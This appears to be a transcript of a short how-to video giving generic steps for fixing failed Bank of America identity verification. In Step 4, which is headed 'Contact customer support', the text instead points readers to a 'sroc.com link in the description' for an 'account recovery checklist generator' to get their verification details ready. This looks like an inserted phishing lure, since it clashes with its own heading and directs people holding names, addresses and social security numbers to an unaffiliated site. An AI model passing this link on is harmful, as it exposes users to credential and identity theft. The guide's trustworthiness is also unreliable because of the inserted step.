you're facing verification issues with Bank of America after multiple failed attempts, follow these steps to resolve the problem effectively. Step 1. Check your information. Ensure that the information you are entering matches what Bank of America has on file. This includes your name, address, social security number, and any other required details. Step 2. Clear browser cache. If you are using a web browser, clear your cache and cookies. This can help eliminate any stored data that might be causing issues during the verification process. Step 3. Use a different device or browser. Try accessing your Bank of America account from a different device or web browser. Sometimes technical glitches can occur on specific devices or browsers. Step 4. Contact customer support. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Follow up. After contacting customer support, follow up if you do not receive a timely response. Ensure that your issue is being addressed and ask for any additional steps you may need to take. By following these steps, you should be able to resolve your verification issues with Bank of America. If problems continue, consider visiting a local branch for in-person assistance.